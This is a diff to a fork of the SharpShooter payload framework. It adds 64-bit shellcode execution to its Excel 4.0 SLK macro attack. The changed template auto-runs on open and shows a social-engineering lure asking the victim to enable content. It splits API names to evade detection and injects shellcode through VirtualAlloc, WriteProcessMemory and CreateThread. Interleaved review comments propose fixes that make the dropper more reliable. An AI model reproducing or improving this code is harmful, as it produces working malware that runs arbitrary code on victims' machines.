3 changes: 2 additions & 1 deletion Readme.md
Expand Up @@ -10,6 +10,7 @@

Description
===========
====SharpShooter fork to add compatibility for 64-bit processes for the .SLK Macros 4.0 attack.====

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code.
SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's [DotNetToJavaScript](https://github.com/tyranid/DotNetToJScript) tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
Expand Down Expand Up @@ -160,4 +161,4 @@ Credits:
- [@buffaloverflow](https://twitter.com/buffaloverflow): Rich Warren for Demiguise
- [@arvanaghi](https://twitter.com/arvanaghi) and [@ChrisTruncer](https://twitter.com/ChrisTruncer): Brandon Arvanaghi and Chris Truncer for CheckPlease
- [@subTee](https://twitter.com/subtee): Documentation for Squiblydoo and Squiblytwo techniques
- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
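--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -64,6 +64,7 @@ def validate_args(self):
 parser.add_argument("--amsi", metavar="<amsi>", dest="amsi", default=None, help="Use amsi bypass technique: amsienable")
 parser.add_argument("--delivery", metavar="<type>", dest="delivery", default=None, help="Delivery method: web, dns, both")
 parser.add_argument("--rawscfile", metavar="<path>", dest="rawscfile", default=None, help="Path to raw shellcode file for stageless payloads")
+parser.add_argument("--rawscfile64", metavar="<path>", dest="rawscfile64", default=None, help="Path to raw shellcode file for stageless payloads. [64bit shellcode]")
 parser.add_argument("--shellcode", action='store_true', help="Use built in shellcode execution")
 parser.add_argument("--scfile", metavar="<path>", dest="shellcode_file", default=None, help="Path to shellcode file as CSharp byte array")
 parser.add_argument("--refs", metavar="<refs>", dest="refs", default=None, help="References required to compile custom CSharp,\ne.g. mscorlib.dll,System.Windows.Forms.dll")
@@ -559,8 +560,7 @@ def run(self, args):
 f.write(macro_stager)
 
 if(payload_type == 9):
-payload = excel4.generate_slk(args.rawscfile)
-
+payload = excel4.generate_slk(args.rawscfile, args.rawscfile64)
 if(args.comtechnique):
 if not args.awltechnique or args.awltechnique == "wmic":
 payload_file = "output/" + outputfile + ".xsl"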
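Review bot: The SLK branch now calls `excel4.generate_slk(args.rawscfile, args.rawscfile64)` with both paths, but `--rawscfile64` defaults to None and nothing checks either option, so building an SLK payload the old way (without `--rawscfile64`) dies with a TypeError from `open(None, "rb")` inside excel4 instead of a usage error. Add a guard before the call, e.g. `if not args.rawscfile or not args.rawscfile64:` followed by `raise SystemExit("[!] SLK payloads need --rawscfile (32-bit) and --rawscfile64 (64-bit)")`, or put the check in validate_args next to the parser; the starts of both validate_args and run lie outside the hunk. The `--rawscfile64` help text should also say it is required for SLK payloads, since the 64-bit file is no longer optional for that payload type.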
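--- a/modules/excel4.py
+++ b/modules/excel4.py
@@ -10,43 +10,78 @@ def bytes2int(str):
 
 SHELLCODE_HEADER = """ID;P
 O;E
-NN;NAuto_open;ER1C1;KSpreadsheet;F
-C;X1;Y1;K0;ER1C2()
-C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
-C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
-C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
-C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
-C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
-C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
-C;X1;Y8;K0;ESELECT(, "R[1]C")
-C;X1;Y9;K0;ENEXT()
-C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
-C;X1;Y11;K0;EHALT()
+NN;NAuto_open;ER5C102;KSpreadsheet;F
+C;X1;Y1;K"Enable Content to update file encoding."
+C;X102;Y1;K"Vir"
+C;X102;Y2;K"tual"
+C;X102;Y3;K"All"
+C;X102;Y4;K"oc"
+C;X102;Y5;K0;ECONCATENATE(R1C102,R2C102,R3C102,R4C102)
+C;X102;Y6;K0;ER1C103()
+C;X103;Y1;K0;EERROR(FALSE, R2C103:R3C103)
+C;X103;Y2;K""C:\\Program Files (x86)\\Microsoft Office\\root""
+C;X103;Y3;K0;EDIRECTORY(R2C103)
+C;X103;Y4;K0;EIF(ISERROR(R3C103), R1C100(), R1C104())
+C;X104;Y1;K0;ER1C105()
+C;X104;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",0,%s,4096,64)
+C;X104;Y3;K0;ESELECT(R1C105:R1000:C105,R1C105)
+C;X104;Y4;K0;ESET.VALUE(R1C99, 0)
+C;X104;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
+C;X104;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C104 + R1C99 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
+C;X104;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
+C;X104;Y8;K0;ESELECT(, "R[1]C")
+C;X104;Y9;K0;ENEXT()
+C;X104;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C104, 0, 0, 0)
+C;X104;Y11;K0;ER11C100()
+C;X100;Y1;K0;ER1C101()
+C;X100;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",1342177280,%s,12288,64)
+C;X100;Y3;K0;ESELECT(R1C101:R1000:C101,R1C101)
+C;X100;Y4;K0;ESET.VALUE(R1C99, 0)
+C;X100;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
+C;X100;Y6;K0;ECALL("kernel32", "RtlCopyMemory", "JJCJ",R2C100 + R1C99 * 20,ACTIVE.CELL(),LEN(ACTIVE.CELL()))
+C;X100;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
+C;X100;Y8;K0;ESELECT(, "R[1]C")
+C;X100;Y9;K0;ENEXT()
+C;X100;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C100, 0, 0, 0)
+C;X100;Y11;K0;ESELECT(R1C1, R1C1)
+C;X100;Y12;K0;ESET.VALUE(R1C1, "AAAAAAA")
+C;X100;Y13;K0;ESET.VALUE(R2C1, "BBBBBBB")
+C;X100;Y14;K0;ESET.VALUE(R3C1, "CCCCCCC")
+C;X100;Y15;K0;ESET.VALUE(R4C1, "DDDDDDD")
+C;X100;Y16;K0;ESET.VALUE(R5C1, "EEEEEEE")
+C;X100;Y17;K0;ESET.VALUE(R6C1, "FFFFFFF")
+C;X100;Y28;K0;EHALT()
 """
 
-def generate_slk(shellcode_path):
-return build_shellcode_slk(shellcode_path)
+def generate_slk(shellcode_path, shellcode_path64):
+return build_shellcode_slk(shellcode_path, shellcode_path64)
 
-def build_shellcode_slk(shellcode_path):
+def build_shellcode_slk(shellcode_path, shellcode_path64):
 #print("[*] Building shellcode exec SLK")
+slk_shellcode_32, size32 = build_shellcode_arch(shellcode_path, 105)
+slk_shellcode_64, size64 = build_shellcode_arch(shellcode_path64, 101)
+slk_output = SHELLCODE_HEADER % (size32, size64)
+slk_output+= slk_shellcode_32 + slk_shellcode_64 + "\nE"
+return slk_output
 
-slk_output = SHELLCODE_HEADER
+def build_shellcode_arch(shellcode_path, raw):
+output = ""
 with open(shellcode_path, "rb") as f:
 byte = f.read(1)
 i = 0
 cell=0
 while byte != "":
 if i == 0:
 cell=cell+1
-slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
+output+=("C;X%s;Y%s;K0;E" % (raw, str(cell)))
 else:
-slk_output+=("&")
-slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
+output+=("&")
+output+=("CHAR(" + str(bytes2int(byte)) + ")")
 byte = f.read(1)
 i+=1
 if i == 20:
-slk_output+=("\n")
+output+=("\n")
 i = 0
 cell=cell+1
-slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
-return slk_output
+output+=("\nC;X%s;Y%s;K0;ERETURN()\n" % (raw, str(cell)))
+return output, cell * 20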
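Review bot: The 64-bit branch of SHELLCODE_HEADER allocates at a fixed base (`C;X100;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",1342177280,%s,12288,64)`, presumably so the returned pointer fits the 32-bit "J" argument type) but never checks the result, so if that range is already mapped VirtualAlloc returns 0 and the RtlCopyMemory loop at Y6 writes relative to address 0 and crashes Excel instead of stopping cleanly; a guard cell such as `IF(R2C100=0,HALT())` directly after the allocation (shifting the later Y indices of column 100 down by one) would close that, and the 32-bit path at Y2 of column 104 has the same gap. The size substituted into both allocations is `cell * 20` taken after the extra `cell=cell+1` for the RETURN() cell, so it is one cell larger than the shellcode — harmless slack, but worth a comment like `# size counts the trailing RETURN() cell: 20 bytes of slack`. `build_shellcode_arch` also keeps the loop condition `while byte != ""`, which never terminates under Python 3 where `f.read(1)` returns `b""` at EOF; if this fork is meant to run on 3.x, compare against `b""` or simply use `while byte:`.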